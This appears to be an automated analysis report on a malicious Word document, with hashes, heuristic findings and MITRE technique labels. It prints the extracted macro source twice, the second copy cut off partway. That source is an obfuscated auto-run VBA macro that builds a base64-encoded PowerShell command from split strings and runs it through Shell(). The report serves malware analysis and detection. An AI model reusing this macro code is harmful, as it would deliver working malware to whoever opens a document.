Office (OLE) malware analysis — malicious · ebcab835d110f6e4

MALICIOUS

Office (OLE)

88.8 KB Created: 2018-06-12 08:11:00 Authoring application: Microsoft Office Word First seen: 2018-07-04

MD5: ff9ca3022ad51f91dbc0ab052116d224 SHA-1: f97b98418fb21fe80f359547f3c598ed4889db96 SHA-256: ebcab835d110f6e47c553170a277bdac577cdeb674debcd085afe801911d456c

150 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro and RLOSTYCk function both call the Shell() function, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious payloads. The specific command executed by Shell() is obfuscated through string concatenation and function calls, but the presence of the Shell() function itself is a critical indicator.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

iaKKd = Tan(16413)
RLOSTYCk = ilcsXDnju + Shell(rvUAG + Chr(XKWGUm + vbKeyP + ENSGhHNc) + "owers" + JadGjFdJdij + EizGo + XRCNmBJF + NrYUMCBiddw + ziHVi, 78079 - 78079)
BGXTp = Tan(17162)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub Autoopen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11683 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11683 bytes
SHA-256: `cf5791460f470b4d9237f9444c4a54e67841f639d2059310f243a6d494138630`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "kNIYNGPZtq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function RLOSTYCk() On Error Resume Next IBMHS = Tan(60832) sXriO = MdFHv oATBw = CDbl(fPrmt) KWRrcF = sKLAzR wssrT = Hex(ZKADpA * ChrW(DmQiG + Int(PYszUA * Rnd(99217)) * DPczT * Log(69338 * HnXATD - AVOCc + Fix(51)))) uFuduV = Tan(3899) EuYqTh = Tan(42439) XEVQWw = thnbMX jRYIO = CDbl(UzEwiK) szJzV = FwJhLU GAvHup = Hex(iLGRL * ChrW(YaYzX + Int(MtFuXn * Rnd(9649)) * SXZkNn * Log(30673 * UDzDsA - hssnD + Fix(51)))) iaKKd = Tan(16413) RLOSTYCk = ilcsXDnju + Shell(rvUAG + Chr(XKWGUm + vbKeyP + ENSGhHNc) + "owers" + JadGjFdJdij + EizGo + XRCNmBJF + NrYUMCBiddw + ziHVi, 78079 - 78079) BGXTp = Tan(17162) KmWEYC = GUCTpM YBfAB = CDbl(nzOZj) LpNfiN = IJuWoP aYFIq = Hex(wicFsT * ChrW(kDNXwU + Int(rssoYG * Rnd(11212)) * Pdfrk * Log(2195 * OrGjwi - NHnKZz + Fix(51)))) wXZTW = Tan(17912) End Function Sub Autoopen() On Error Resume Next fRkkhs = Tan(28822) ZAimmo = RNYKK lBNjGw = CDbl(GGXOr) jaWwO = ROhmbm QbGLv = Hex(wDuQW * ChrW(buvsT + Int(UvWFuu * Rnd(28329)) * VsQDO * Log(71957 * thrAuc - tMoKz + Fix(51)))) nuVWOJ = Tan(14336) RLOSTYCk pLjLzl = Tan(80828) nrBlK = NErZAR KRkvU = CDbl(aXtoE) BDWKpw = MnYwIN GhRioI = Hex(pfuwPd * ChrW(PitCw + Int(IdrtC * Rnd(55125)) * EOlUb * Log(64746 * PtFPAv - MYbOZT + Fix(51)))) zEfuLG = Tan(52430) End Sub Attribute VB_Name = "pXcLwlbtZUh" Function JadGjFdJdij() On Error Resume Next AKHRj = Tan(43218) cwdRZw = dwwVz jiRqd = CDbl(AVXwY) vqYzlJ = EAbjow wGrmnH = Hex(FVVtQn * ChrW(WUEBF + Int(dIziK * Rnd(78937)) * uPEvdr * Log(76324 * udlJQ - pUCFV + Fix(51)))) PhjWi = Tan(66949) jYfkO = "HeLL -e IAAoA" + "G4AZQBXAC0ATwBi" + "AGoAZQBDAH" + "QAIABJAE" + "8ALg" + "BjAG8ATQBQAHIA" + "ZQBzAFMASQBv" MoINbw = Tan(49251) qRaQYA = cqTso oouYp = CDbl(SMjiN) NbalPJ = qHzCc wVGFpD = Hex(tNXAOp * ChrW(iGkHiN + Int(KYiqa * Rnd(18334)) * wJolRi * Log(84980 * MGtfXA - DaXaW + Fix(51)))) kWsUPT = Tan(73218) iHWZmjnfXFk = "AG4ALgBEA" + "GUARgBsAGEAVA" + "BFAFMAVABSA" + "EUAQQBNACgAWwBz" + "AFkAcwB0AEUAbQ" XPOtIv = Tan(8718) PwGuju = NDpVKU TAmAO = CDbl(wQCPGB) rflPEv = KbUcA tiQazb = Hex(PwOGHh * ChrW(mwuqo + Int(FliSaQ * Rnd(28666)) * zsfKAY * Log(85808 * AcSiZ - vRiHX + Fix(51)))) iMhinV = Tan(69945) jdKzAJvVhi = "AuAEkATw" + "AuAG0AZQ" + "BNAG8AUgBZAFMA" + "VAByAGUAYQBNAF0" + "AWwBDAG8AbgBW" wwzjM = Tan(53879) EiwGI = VwRYK fqQoS = CDbl(lRlLBX) okUCcl = zHrii ODMOP = Hex(dQERj * ChrW(hnaKj + Int(hYbUoA * Rnd(92600)) * msHYwi * Log(11470 * fiFXw - uOjTor + Fix(51)))) wrnbwB = Tan(17780) hjpJmYh = "AGUAUgB" + "UAF0AOgA6AGYAUg" + "BPAE0AQgBhAF" + "MARQA2ADQ" + "AUwBUAHIAaQBOAG" + "cAKAAnAFYAWgBCA" + "GIAYQ" + "A4AEoAQ" tOLRZT = Tan(71844) jSzEQ = sEJzm MlVMEu = CDbl(BTwAhw) lTtFWb = FDAqn qwiSBO = Hex(NIszNi * ChrW(kpjSQH + Int(WZLEa * Rnd(20820)) * GiVVQ * Log(30160 * CliwSS - datrrv + Fix(51)))) QThaj = Tan(10793) jqdqwI = "QBFAEkAWAA" + "vAH" + "kAagA0AE" + "UAawBsAEQAZ" + "ABLAEMA" + "bwB0AGgAbwBLAHQ" + "AbAA1" + "AGQAVwBx" + "AG" + "EAUQBY" YXNaE = Tan(15763) aXizP = hEETzp twRMiP = CDbl(qOnukK) iNQXOK = DDPuc qLOOd = Hex(JaZFAs * ChrW(KQLjjN + Int(EDqnv * Rnd(67726)) * apvCSF * Log(3490 * izZRt - CEIPf + Fix(51)))) zFrUj = Tan(63511) pupCaOMbzIZ = "AEsAZwBYAFoA" + "YgBNAF" + "oAawBkAG" + "QAMQBkAE4AbABQ" + "AGoAQgBmA" + "DkANwB0ADI" + "AcQBGAHY" + "AZwB6AE" + "0Abg" InVaS = Tan(88107) ikiDi = nDlMJR EBwhY = CDbl(JfVwb) litTJ = HXjRR Fhsmw = Hex(iKONT * ChrW(onCCk + Int(NmDhwE * Rnd(88216)) * boCtnm * Log(69121 * cqXXi - TQGYO + Fix(51)))) iWVFnA = Tan(8086) OFwivwoiq = "BPADgA" + "dwBaADgAWQByADk" + "Abg" + "BMAEU" + "AeQBEAD" + "EAUgB" + "VAE4AVgAxAHU" + "AZwBTAE8AeAB" + "EAEsAVgA2A" WXlosM = Tan(84819) IVahWP = MfNwM mbXpH = CDbl(FSzFn) EDFFii = JdIlw PPMIaa = Hex(rNjwN * ChrW(lHmXLP + Int(zSMEHw * Rnd(66976)) * DpipZI * Log(84117 * tJWflq - TJrktO + Fix(51)))) FzWLi = Tan(94450) IXTzMpnj = "FgAWABz" + "AHEAVwBlAFoASgB" + "2ACsAbABaAEYAY" + "wBpAHIATwBrAEUA" + "awBIAD" + "UAQ" + "QAyAHAAYw" + "BDAEYATQBiAGU" HBirY = Tan(76706) FGoqt = tNojB bsvPL = CDbl(OhjjTN) umlIsn = CSOCD zwcrJm = Hex(ZVKLl * ChrW(BKGoY + Int(aPwfHF * Rnd(90855)) * pGIisM * Log(33573 * SEsXhD - ZcZWa + Fix(51)))) CwipPc = Tan(58819) jOuazkqZQlJ = "AYwBEA" + "FkAMgAyAG8ARgA" + "rAGcAVw" + "BpADYAVQBhAF" + "QAQQBNAEMAT" + "wBZADAAc" RVlOq = Tan(40481) MjTZA = rBwBG PZChi = CDbl(KmJio) kmpBjG = qihMv zZaKu = Hex(nJEPaO * ChrW(DtjiJi + Int(qpNWqS * Rnd(80473)) * PpiNHb * Log(72530 * kcPvBS - XOmvDP + Fix(51)))) AXiEP = Tan(14948) awsIK = "ABUAHIA" + "ZAB" + "mAF" + "QAKwBhAE0A" + "dQBvAG" JadGjFdJdij = jYfkO + iHWZmjnfXFk + jdKzAJvVhi + hjpJmYh + jqdqwI + pupCaOMbzIZ + OFwivwoiq + IXTzMpnj + jOuazkqZQlJ + awsIK End Function Function EizGo() On Error Resume Next DTbsu = Tan(89262) hNHMR = vFumqY qHDXm = CDbl(EpKjDL) ijJoDH = QqBfi QOudrN = Hex(zVwPEF * ChrW(pZWiD + Int(nQPwF * Rnd(67271)) * ztAGXo * Log(1756 * quhrp - jMjtj + Fix(51)))) qiqTWb = Tan(64434) EOQrMPUBX = "QANQBHAH" + "kAcABkA" + "GcAS" + "QB" + "xAG0AUQBrA" + "FoAbgBwAHcAbg" + "BaAFkARwBtAEoA" + "VwBTAG4" + "ALwBoADUA" + "VgBxAHEAbwA2A" zwwXIi = Tan(84716) VqrQE = zipnO HDjCWl = CDbl(QChjwG) NrwKi = bcrtC smjLi = Hex(NzrvSw * ChrW(XlbBo + Int(vJCpI * Rnd(66487)) * EEFfMm * Log(427 * sGhqC - iGLRY + Fix(51)))) ILYAa = Tan(6699) LCswI = "Ew" + "AUwBaAF" + "QASwA4AEEAa" + "wAwAG" + "EANABHAEoAR" + "AB" + "tA" + "FYAbgAr" + "AGIARQAvAGIA" GJqwbd = Tan(97917) IuLjjv = iftKlG CqXji = CDbl(tjFEI) tsCJGN = VZMzi EKjsGQ = Hex(jtHzZ * ChrW(uclcoH + Int(jCFbWn * Rnd(93538)) * kmqrpr * Log(58588 * Nnwnq - zlDkO + Fix(51)))) bkzXr = Tan(14891) svYFTozRol = "UQB6AEYAZgB5AEM" + "AbABSAF" + "YAUgBSA" + "GYAYwB3AEYA" + "MgB6A" + "GQAZAB1AGc" + "AQwB4AHUATgBwAE" + "gAbgBpAC" BFEWS = Tan(38549) wHRHjA = RYpqU NCTYmY = CDbl(FzpSzh) cFIRfT = XsUvA CKMHh = Hex(Xwzmj * ChrW(uqfwRw + Int(CUnLP * Rnd(46557)) * AfqJz * Log(56307 * Kbvnhk - KjdTch + Fix(51)))) dZabVm = Tan(96860) oMWtXYmGvUQ = "sAOABpAG4Aa" + "QBaAEUAQw" + "BBADcALwBuA" + "GgA" + "NwBIA" + "FgAbgAwADYA" + "VwBtAFE" + "AdgBx" + "AG4A" OwwjXX = Tan(85371) pmCwj = jIjOj oJrnrY = CDbl(FPidq) QMzqwN = RXojZ COpSrH = Hex(GFEGJ * ChrW(zzmtGJ + Int(LTBmS * Rnd(72202)) * caQVL * Log(26380 * WIPwq - kjKIq + Fix(51)))) FOEiih = Tan(44704) jFHjYEJsIqK = "YQA2" + "AG0AQwByAFkAWQ" + "BOAEcA" + "dQBr" + "ADIAZQBt" + "ADAAVwB3ADIA" EizGo = EOQrMPUBX + LCswI + svYFTozRol + oMWtXYmGvUQ + jFHjYEJsIqK End Function Function XRCNmBJF() On Error Resume Next XiNDA = Tan(11747) ijpjv = jcrXwP ciJtwl = CDbl(mXvmnn) lovMw = PFAVYu VlMHhR = Hex(ktYTGP * ChrW(TGkCvH + Int(wowKzi * Rnd(46323)) * doUBz * Log(19314 * KoFVE - sPcGh + Fix(51)))) vzQSd = Tan(75404) lKJjz = "bg" + "Bq" + "ADkAN" + "gBXADYAZQ" + "BwAFgAQgA3AF" + "gAcAB1AG" + "sA" + "TQBOAHU" + "AUwBIA" XwQwhm = Tan(22594) PkwFP = SwwzZ fGZUE = CDbl(UcXNW) OJmFtr = jsBcf ASucCT = Hex(EjKQW * ChrW(rPSiqC + Int(HqFdM * Rnd(4754)) * ZqLid * Log(88324 * DzazUu - nizVi + Fix(51)))) zHQJKa = Tan(33956) PvRMjFRjkw = "CsAbAArAC8Ac" + "QB4AGU" + "AcABhAEMAb" + "AB2AHcANAA0AFcA" + "MgB" + "3AEgAZwBSAG" + "UATgBsAG4AZwBs" KNQQA = Tan(26968) NYfmcF = QsjWHM MGHiF = CDbl(SZBUD) UtmJjU = GZGTjF LqYanS = Hex(CwGJl * ChrW(IcoWLj + Int(luijz * Rnd(4253)) * GvFmYY * Log(26312 * bBbjkX - vfzzY + Fix(51)))) dljIz = Tan(10233) zBUDiiOGw = "AE4ARABo" + "AEMATABuAE4" + "ANABRA" + "EgAdA" QMoal = Tan(82516) GsUlNh = Amufw SzzjBd = CDbl(cKWiY) HiPNB = tYLCLO rKdwod = Hex(bnRME * ChrW(InWwW + Int(MuZjlZ * Rnd(87780)) * EFHwoV * Log(33808 * tzLhBX - UMCIcm + Fix(51)))) BOjVB = Tan(79974) BvOvduhhV = "BMAHYARAArAFg" + "AZAAwAG8AQwBzA" + "GwATgBjAHQA" + "RwBRAHMASQBmA" + "FMAbAA5ADEA" + "ZwBsAG" + "EA" brZvs = Tan(93129) fUYjH = uXlpo DFWiRR = CDbl(zDtQTU) USHmmI = UosiZV Mdcrh = Hex(mLEII * ChrW(vwSmDF + Int(fCbPz * Rnd(5882)) * NjQdEr * Log(92580 * laQZmH - INziIN + Fix(51)))) BCoYKp = Tan(25552) qjhkd = "bwBQAEEA" + "aAByADUATAB3AH" + "gAa" + "gBC" + "AE4AawBGAH" NdoBwC = Tan(90834) DQhNNs = iTHpu QUuRl = CDbl(OofhGU) MmlkI = NmvOaA JjKFC = Hex(TWzIt * ChrW(NVhlYi + Int(sMjjti * Rnd(98171)) * hbVGU * Log(33169 * Yhiaf - BiOdr + Fix(51)))) vRfAX = Tan(61786) pWlJocPtti = "UAcwB2AFY" + "AbgBNAG8AeQ" + "A4AHMA" + "MABUAHQAMgB" + "LA" + "FY" IDcwQX = Tan(6511) lubCYS = zzHzCV hRGBhD = CDbl(BawaVI) vkNCc = PknbT DUjtZd = Hex(RVLqPp * ChrW(NkTdbD + Int(ZBOtv * Rnd(51181)) * aziii * Log(97854 * QUhYz - rzkuwN + Fix(51)))) uiQJzQ = Tan(48474) dfJClHBW = "AWAB" + "6AGsARABIAGwAeA" + "BxAEsAeABB" + "AHE" + "AQgBlA" + "DYAUgBP" XRCNmBJF = lKJjz + PvRMjFRjkw + zBUDiiOGw + BvOvduhhV + qjhkd + pWlJocPtti + dfJClHBW End Function Function NrYUMCBiddw() On Error Resume Next TSAiCO = Tan(82369) jMjqw = QmEiKS QUuhzU = CDbl(hUiSZW) CjuuiA = DiRWi OiEVFG = Hex(CzGwE * ChrW(uqLhOR + Int(wNGKkj * Rnd(34877)) * MmcKT * Log(43451 * CQJMSV - EZzpjF + Fix(51)))) sADFCw = Tan(1397) FGAfno = "AEwATgA2AFgARA" + "BM" + "AHcAYQB" + "EAF" + "EAaQBvADY" + "AZABnA" + "GUAVQBRA" + "EgANAA4AC8A" + "JwApACAALABbA" + "GkAT" ukZoz = Tan(80846) dlkXN = vXCwGD jMuwM = CDbl(UlZFR) jiWYn = VFsvME swwcB = Hex(vurrh * ChrW(ccjVaE + Int(TzjIZz * Rnd(28213)) * kwQkA * Log(81749 * UWXIYz - dpnoi + Fix(51)))) CojSr = Tan(61233) YNBXh = "wAuAGMATwBNAFA" + "AcgB" + "FAFMAcw" + "BpAE8ATg" + "AuAGMATwBtAHA" + "AUgBFAHM" + "AUwBpAE8" + "AbgBNAE8AR" + "ABlAF0AOg" LLnXdm = Tan(76180) waHhz = HJzRji WrVkQD = CDbl(vPwtU) YJjAi = KKhPfH TuilAK = Hex(npUSmN * ChrW(VOjbOM + Int(Swazmv * Rnd(47348)) * pbpdjk * Log(44417 * dziXR - oQORCo + Fix(51)))) AnRupA = Tan(92948) PrJukUQN = "A6AEQ" + "AZQBDAE8AT" + "QBwAHIAZQBTA" + "FM" + "AKQAgA" + "HwAJQAgAHsAIA" + "Bu" + "AGUAVwAtAE8AY" + "gBqAGUAQ" oOPYA = Tan(99024) dJjwwz = ijpcj KiVsk = CDbl(poYjrk) MojSwR = wnFkEp zJlENR = Hex(tFsXoK * ChrW(DEZpO + Int(kOvNq * Rnd(21340)) * NWdlnu * Log(86238 * fmiiSn - jqvKH + Fix(51)))) sifvqR = Tan(25008) obYjA = "wB0ACAAI" + "ABpAG8" + "ALgBTAHQAU" + "gBlAGEATQByA" + "EUAYQBEAE" + "UAUgA" + "oACQAXwAsACAAW" + "wBzAHkAUwB" + "UAEUATQAuAFQAR" NrYUMCBiddw = FGAfno + YNBXh + PrJukUQN + obYjA End Function Function ziHVi() On Error Resume Next NYNCSZ = Tan(44313) HjtRSY = uKvkR ERjEYU = CDbl(wpzdfJ) ORczO = GjMRpH Qkkvh = Hex(DJGhwt * ChrW(idRmQ + Int(JGDdiv * Rnd(42100)) * YVEPO * Log(32323 * XNFCv - FIHkiG + Fix(51)))) NcRaB = Tan(8561) vzBdwlQ = "QB4AFQALgBFAE4" + "AYwBvAEQAaQBOAE" + "cAXQA6ADo" + "AYQBTAGMASQ" + "BJACkAfQ" + "AgACkALgBSAG" + "UAYQBkA" NMGBzL = Tan(49447) nCRjdF = QMkUA wvtEp = CDbl(IvEiN) RmKGD = kKZUF udDBM = Hex(pjDuO * ChrW(NzKwR + Int(jXEZLS * Rnd(1003)) * Ihkpi * Log(57763 * bJMJGi - ojGWYt + Fix(51)))) Fsltpl = Tan(65473) VPUmk = "FQATwBlAG4AZA" + "AoAC" + "AAKQB8" + "AC4AIAAoA" + "CAAJ" + "ABwAFMASABPA" + "G0ARQBbA" URlBD = Tan(94119) wNQka = ozoLBk XTouGQ = CDbl(pwwps) MouYE = BjksGn GRuwi = Hex(AzrBdq * ChrW(nuSwRb + Int(SZzDQG * Rnd(44029)) * CmbhGo * Log(18610 * vBOBsJ - nQhKr + Fix(51)))) Olbiv = Tan(415) hBcAiAWk = "DI" + "AMQBdACsAJ" + "ABQ" + "AHMASABPAE0A" + "ZQB" + "bA" SqjcQR = Tan(93764) ZvjGd = XwDaw DLmiw = CDbl(boBADL) cSEUmk = MROVwD wrpXE = Hex(qcHEwf * ChrW(pIDZsY + Int(AqSbR * Rnd(79561)) * zmzRk * Log(85474 * dzLcw - zzLzW + Fix(51)))) zmDOo = Tan(54956) jhisQ = "DMA" + "MABdAC" + "sAJwB4AC" + "cAKQA=" ziHVi = vzBdwlQ + VPUmk + hBcAiAWk + jhisQ End Function

SHA-256: cf5791460f470b4d9237f9444c4a54e67841f639d2059310f243a6d494138630

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "kNIYNGPZtq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function RLOSTYCk()
On Error Resume Next
IBMHS = Tan(60832)
sXriO = MdFHv
oATBw = CDbl(fPrmt)
KWRrcF = sKLAzR
wssrT = Hex(ZKADpA * ChrW(DmQiG + Int(PYszUA * Rnd(99217)) * DPczT * Log(69338 * HnXATD - AVOCc + Fix(51))))
uFuduV = Tan(3899)
EuYqTh = Tan(42439)
XEVQWw = thnbMX
jRYIO = CDbl(UzEwiK)
szJzV = FwJhLU
GAvHup = Hex(iLGRL * ChrW(YaYzX + Int(MtFuXn * Rnd(9649)) * SXZkNn * Log(30673 * UDzDsA - hssnD + Fix(51))))
iaKKd = Tan(16413)
RLOSTYCk = ilcsXDnju + Shell(rvUAG + Chr(XKWGUm + vbKeyP + ENSGhHNc) + "owers" + JadGjFdJdij + EizGo + XRCNmBJF + NrYUMCBiddw + ziHVi, 78079 - 78079)
BGXTp = Tan(17162)
KmWEYC = GUCTpM
YBfAB = CDbl(nzOZj)
LpNfiN = IJuWoP
aYFIq = Hex(wicFsT * ChrW(kDNXwU + Int(rssoYG * Rnd(11212)) * Pdfrk * Log(2195 * OrGjwi - NHnKZz + Fix(51))))
wXZTW = Tan(17912)
End Function
Sub Autoopen()
On Error Resume Next
fRkkhs = Tan(28822)
ZAimmo = RNYKK
lBNjGw = CDbl(GGXOr)
jaWwO = ROhmbm
QbGLv = Hex(wDuQW * ChrW(buvsT + Int(UvWFuu * Rnd(28329)) * VsQDO * Log(71957 * thrAuc - tMoKz + Fix(51))))
nuVWOJ = Tan(14336)
RLOSTYCk
pLjLzl = Tan(80828)
nrBlK = NErZAR
KRkvU = CDbl(aXtoE)
BDWKpw = MnYwIN
GhRioI = Hex(pfuwPd * ChrW(PitCw + Int(IdrtC * Rnd(55125)) * EOlUb * Log(64746 * PtFPAv - MYbOZT + Fix(51))))
zEfuLG = Tan(52430)
End Sub


Attribute VB_Name = "pXcLwlbtZUh"
Function JadGjFdJdij()
On Error Resume Next
AKHRj = Tan(43218)
cwdRZw = dwwVz
jiRqd = CDbl(AVXwY)
vqYzlJ = EAbjow
wGrmnH = Hex(FVVtQn * ChrW(WUEBF + Int(dIziK * Rnd(78937)) * uPEvdr * Log(76324 * udlJQ - pUCFV + Fix(51))))
PhjWi = Tan(66949)
jYfkO = "HeLL -e IAAoA" + "G4AZQBXAC0ATwBi" + "AGoAZQBDAH" + "QAIABJAE" + "8ALg" + "BjAG8ATQBQAHIA" + "ZQBzAFMASQBv"
MoINbw = Tan(49251)
qRaQYA = cqTso
oouYp = CDbl(SMjiN)
NbalPJ = qHzCc
wVGFpD = Hex(tNXAOp * ChrW(iGkHiN + Int(KYiqa * Rnd(18334)) * wJolRi * Log(84980 * MGtfXA - DaXaW + Fix(51))))
kWsUPT = Tan(73218)
iHWZmjnfXFk = "AG4ALgBEA" + "GUARgBsAGEAVA" + "BFAFMAVABSA" + "EUAQQBNACgAWwBz" + "AFkAcwB0AEUAbQ"
XPOtIv = Tan(8718)
PwGuju = NDpVKU
TAmAO = CDbl(wQCPGB)
rflPEv = KbUcA
tiQazb = Hex(PwOGHh * ChrW(mwuqo + Int(FliSaQ * Rnd(28666)) * zsfKAY * Log(85808 * AcSiZ - vRiHX + Fix(51))))
iMhinV = Tan(69945)
jdKzAJvVhi = "AuAEkATw" + "AuAG0AZQ" + "BNAG8AUgBZAFMA" + "VAByAGUAYQBNAF0" + "AWwBDAG8AbgBW"
wwzjM = Tan(53879)
EiwGI = VwRYK
fqQoS = CDbl(lRlLBX)
okUCcl = zHrii
ODMOP = Hex(dQERj * ChrW(hnaKj + Int(hYbUoA * Rnd(92600)) * msHYwi * Log(11470 * fiFXw - uOjTor + Fix(51))))
wrnbwB = Tan(17780)
hjpJmYh = "AGUAUgB" + "UAF0AOgA6AGYAUg" + "BPAE0AQgBhAF" + "MARQA2ADQ" + "AUwBUAHIAaQBOAG" + "cAKAAnAFYAWgBCA" + "GIAYQ" + "A4AEoAQ"
tOLRZT = Tan(71844)
jSzEQ = sEJzm
MlVMEu = CDbl(BTwAhw)
lTtFWb = FDAqn
qwiSBO = Hex(NIszNi * ChrW(kpjSQH + Int(WZLEa * Rnd(20820)) * GiVVQ * Log(30160 * CliwSS - datrrv + Fix(51))))
QThaj = Tan(10793)
jqdqwI = "QBFAEkAWAA" + "vAH" + "kAagA0AE" + "UAawBsAEQAZ" + "ABLAEMA" + "bwB0AGgAbwBLAHQ" + "AbAA1" + "AGQAVwBx" + "AG" + "EAUQBY"
YXNaE = Tan(15763)
aXizP = hEETzp
twRMiP = CDbl(qOnukK)
iNQXOK = DDPuc
qLOOd = Hex(JaZFAs * ChrW(KQLjjN + Int(EDqnv * Rnd(67726)) * apvCSF * Log(3490 * izZRt - CEIPf + Fix(51))))
zFrUj = Tan(63511)
pupCaOMbzIZ = "AEsAZwBYAFoA" + "YgBNAF" + "oAawBkAG" + "QAMQBkAE4AbABQ" + "AGoAQgBmA" + "DkANwB0ADI" + "AcQBGAHY" + "AZwB6AE" + "0Abg"
InVaS = Tan(88107)
ikiDi = nDlMJR
EBwhY = CDbl(JfVwb)
litTJ = HXjRR
Fhsmw = Hex(iKONT * ChrW(onCCk + Int(NmDhwE * Rnd(88216)) * boCtnm * Log(69121 * cqXXi - TQGYO + Fix(51))))
iWVFnA = Tan(8086)
OFwivwoiq = "BPADgA" + "dwBaADgAWQByADk" + "Abg" + "BMAEU" + "AeQBEAD" + "EAUgB" + "VAE4AVgAxAHU" + "AZwBTAE8AeAB" + "EAEsAVgA2A"
WXlosM = Tan(84819)
IVahWP = MfNwM
mbXpH = CDbl(FSzFn)
EDFFii = JdIlw
PPMIaa = Hex(rNjwN * ChrW(lHmXLP + Int(zSMEHw * Rnd(66976)) * DpipZI * Log(84117 * tJWflq - TJrktO + Fix(51))))
FzWLi = Tan(94450)
IXTzMpnj = "FgAWABz" + "AHEAVwBlAFoASgB" + "2ACsAbABaAEYAY" + "wBpAHIATwBrAEUA" + "awBIAD" + "UAQ" + "QAyAHAAYw" + "BDAEYATQBiAGU"
HBirY = Tan(76706)
FGoqt = tNojB
bsvPL = CDbl(OhjjTN)
umlIsn = CSOCD
zwcrJm = Hex(ZVKLl * ChrW(BKGoY + Int(aPwfHF * Rnd(90855)) * pGIisM * Log(33573 * SEsXhD - ZcZWa + Fix(51))))
CwipPc = Tan(58819)
jOuazkqZQlJ = "AYwBEA" + "FkAMgAyAG8ARgA" + "rAGcAVw" + "BpADYAVQBhAF" + "QAQQBNAEMAT" + "wBZADAAc"
RVlOq = Tan(40481)
MjTZA = rBwBG
PZChi = CDbl(KmJio)
kmpBjG = qihMv
zZaKu = Hex(nJEPaO * ChrW(DtjiJi + Int(qpNWqS * Rnd(80473)) * PpiNHb * Log(72530 * kcPvBS - XOmvDP + Fix(51))))
AXiEP = Tan(14948)
awsIK = "ABUAHIA" + "ZAB" + "mAF" + "QAKwBhAE0A" + "dQBvAG"
JadGjFdJdij = jYfkO + iHWZmjnfXFk + jdKzAJvVhi + hjpJmYh + jqdqwI + pupCaOMbzIZ + OFwivwoiq + IXTzMpnj + jOuazkqZQlJ + awsIK
End Function
Function EizGo()
On Error Resume Next
DTbsu = Tan(89262)
hNHMR = vFumqY
qHDXm = CDbl(EpKjDL)
ijJoDH = QqBfi
QOudrN = Hex(zVwPEF * ChrW(pZWiD + Int(nQPwF * Rnd(67271)) * ztAGXo * Log(1756 * quhrp - jMjtj + Fix(51))))
qiqTWb = Tan(64434)
EOQrMPUBX = "QANQBHAH" + "kAcABkA" + "GcAS" + "QB" + "xAG0AUQBrA" + "FoAbgBwAHcAbg" + "BaAFkARwBtAEoA" + "VwBTAG4" + "ALwBoADUA" + "VgBxAHEAbwA2A"
zwwXIi = Tan(84716)
VqrQE = zipnO
HDjCWl = CDbl(QChjwG)
NrwKi = bcrtC
smjLi = Hex(NzrvSw * ChrW(XlbBo + Int(vJCpI * Rnd(66487)) * EEFfMm * Log(427 * sGhqC - iGLRY + Fix(51))))
ILYAa = Tan(6699)
LCswI = "Ew" + "AUwBaAF" + "QASwA4AEEAa" + "wAwAG" + "EANABHAEoAR" + "AB" + "tA" + "FYAbgAr" + "AGIARQAvAGIA"
GJqwbd = Tan(97917)
IuLjjv = iftKlG
CqXji = CDbl(tjFEI)
tsCJGN = VZMzi
EKjsGQ = Hex(jtHzZ * ChrW(uclcoH + Int(jCFbWn * Rnd(93538)) * kmqrpr * Log(58588 * Nnwnq - zlDkO + Fix(51))))
bkzXr = Tan(14891)
svYFTozRol = "UQB6AEYAZgB5AEM" + "AbABSAF" + "YAUgBSA" + "GYAYwB3AEYA" + "MgB6A" + "GQAZAB1AGc" + "AQwB4AHUATgBwAE" + "gAbgBpAC"
BFEWS = Tan(38549)
wHRHjA = RYpqU
NCTYmY = CDbl(FzpSzh)
cFIRfT = XsUvA
CKMHh = Hex(Xwzmj * ChrW(uqfwRw + Int(CUnLP * Rnd(46557)) * AfqJz * Log(56307 * Kbvnhk - KjdTch + Fix(51))))
dZabVm = Tan(96860)
oMWtXYmGvUQ = "sAOABpAG4Aa" + "QBaAEUAQw" + "BBADcALwBuA" + "GgA" + "NwBIA" + "FgAbgAwADYA" + "VwBtAFE" + "AdgBx" + "AG4A"
OwwjXX = Tan(85371)
pmCwj = jIjOj
oJrnrY = CDbl(FPidq)
QMzqwN = RXojZ
COpSrH = Hex(GFEGJ * ChrW(zzmtGJ + Int(LTBmS * Rnd(72202)) * caQVL * Log(26380 * WIPwq - kjKIq + Fix(51))))
FOEiih = Tan(44704)
jFHjYEJsIqK = "YQA2" + "AG0AQwByAFkAWQ" + "BOAEcA" + "dQBr" + "ADIAZQBt" + "ADAAVwB3ADIA"
